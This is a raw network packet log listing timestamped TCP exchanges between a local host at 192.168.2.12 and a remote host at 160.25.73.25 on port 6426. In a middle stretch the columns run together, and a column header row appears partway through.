Dec 14, 2024 14:00:52.323569059 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.347290039 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.347388983 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.347460985 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.349049091 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.349229097 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.349283934 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.351794958 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.351896048 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.351954937 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.355323076 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.355431080 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.355492115 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.358875990 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.359041929 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.359097958 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.362354040 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.362446070 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.362509966 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.365917921 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.366012096 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.366075993 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.369774103 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.369951963 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.370012045 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.373996973 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.374167919 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.374217033 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.376971006 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.377074957 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.377125978 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.380104065 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.380314112 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.380362034 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.383990049 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.384133101 CET  6426   49721  160.25.73.25  192.168.2.12
Dec 14, 2024 14:00:52.384180069 CET  49721  6426   192.168.2.12  160.25.73.25
Dec 14, 2024 14:00:52.387234926 CET  6426   49721  160.25.73.25  192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.387396097 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.387453079 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.390645027 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.390739918 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.390913963 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.394129992 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.394325972 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.394376040 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.397608042 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.397708893 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.397763014 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.401163101 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.401294947 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.401355028 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.404654026 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.404768944 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.404824018 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.408191919 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.408258915 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.408318043 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.411684990 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.411875963 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.411927938 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.415184021 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.415309906 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.415405989 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.418732882 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.418801069 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.418864012 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.422214985 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.422322989 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.422488928 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.425935984 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.426001072 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.426055908 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.429290056 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.429378986 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.429431915 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.432776928 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.432899952 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.432948112 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.436297894 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.436346054 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.436397076 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.439814091 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.439945936 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.440011024 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.443398952 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.443473101 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.443526030 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.446867943 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.447069883 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.447139978 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.450395107 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.450506926 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.450567007 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.453898907 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.453996897 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.454050064 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.457484961 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.457559109 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.457618952 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.460912943 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.461051941 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.461103916 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.464466095 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.464555025 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.464633942 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.467974901 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.468133926 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.468193054 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.471451998 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.511060953 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.604989052 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.605052948 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.605225086 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.605870962 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.605993986 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.606044054 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.607711077 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.607857943 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.607920885 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.609532118 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.609608889 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.609659910 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.611330986 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.611443043 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.611491919 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.613632917 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.613770962 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.613817930 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.615169048 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.615238905 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.615291119 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.616806030 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.616882086 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.616925955 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.618557930 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.618681908 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.618733883 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.620450020 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.620600939 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.620646954 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.622159004 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.622291088 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.622340918 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.624028921 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.624136925 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.624178886 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.625798941 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.625900984 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.625941992 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.627605915 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.627722979 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.627774000 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.629833937 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.630023003 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.630079031 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.632170916 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.632260084 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.632306099 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.633805990 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.633948088 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.633997917 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.635363102 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.635457039 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.635509014 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.636790037 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.636878967 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.636930943 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.638528109 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.638600111 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.638652086 CET497216426192.168.2.12160.25.73.25
                                                                                                                                          Dec 14, 2024 14:00:52.640230894 CET642649721160.25.73.25192.168.2.12
                                                                                                                                          Dec 14, 2024 14:00:52.640333891 CET642649721160.25.73.25192.168.2.12
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Dec 14, 2024 14:00:52.640382051 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.642056942 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.642141104 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.642189026 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.643846035 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.643955946 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.644005060 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.645725965 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.645843029 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.645895958 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.647465944 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.647511959 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.647557020 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.649276018 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.649286985 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.649331093 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.651074886 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.651125908 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.651176929 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.652859926 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.652971029 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.653017998 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.654679060 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.654794931 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.654846907 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.656476974 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.656589985 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.656634092 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.658341885 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.658457994 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.658504009 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.660155058 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.660202980 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.660248995 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.661973000 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.662020922 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.662075043 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.663708925 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.663826942 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.663875103 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.665510893 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.665678024 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.665725946 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.667330027 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.667418003 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.667465925 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.669168949 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.669240952 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.669287920 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.670927048 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.671050072 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.671097040 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.672750950 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.672861099 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.672903061 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.674560070 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.674712896 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.674761057 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.676354885 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.676455975 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.676525116 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.678271055 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.678431988 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.678483009 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.679991007 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.680088997 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.680135012 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.681806087 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.681879997 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.681926966 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.683617115 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.683708906 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.683753014 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.685394049 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.685633898 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.685677052 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.687230110 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.687391996 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.687448978 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.689029932 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.689177036 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.689223051 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.797070980 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.839212894 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.861233950 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.861428976 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.861500025 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.861938953 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.862065077 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.862124920 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.863576889 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.863682985 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.863728046 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.865130901 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.865284920 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.865326881 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.866714954 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.866820097 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.866862059 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.868307114 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.868442059 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.868489027 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.869916916 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.870009899 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.870054007 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.871534109 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.871617079 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.871666908 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.873081923 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.873508930 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.873558044 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.874654055 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.874757051 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.874804974 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.876271963 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.876348972 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.876386881 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.877996922 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.878066063 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.878114939 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.879729033 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.879775047 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.879825115 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.881197929 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.881266117 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.881313086 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.882775068 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.882860899 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.882908106 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.884190083 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.884315968 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.884362936 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.885771036 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.885907888 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.885946989 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.887356997 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.887445927 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.887485981 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.889039040 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.889100075 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.889151096 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.890505075 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.890661955 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.890711069 CET  49721        6426       192.168.2.12   160.25.73.25
Dec 14, 2024 14:00:52.892124891 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.892275095 CET  6426         49721      160.25.73.25   192.168.2.12
Dec 14, 2024 14:00:52.892324924 CET  49721        6426       192.168.2.12   160.25.73.25
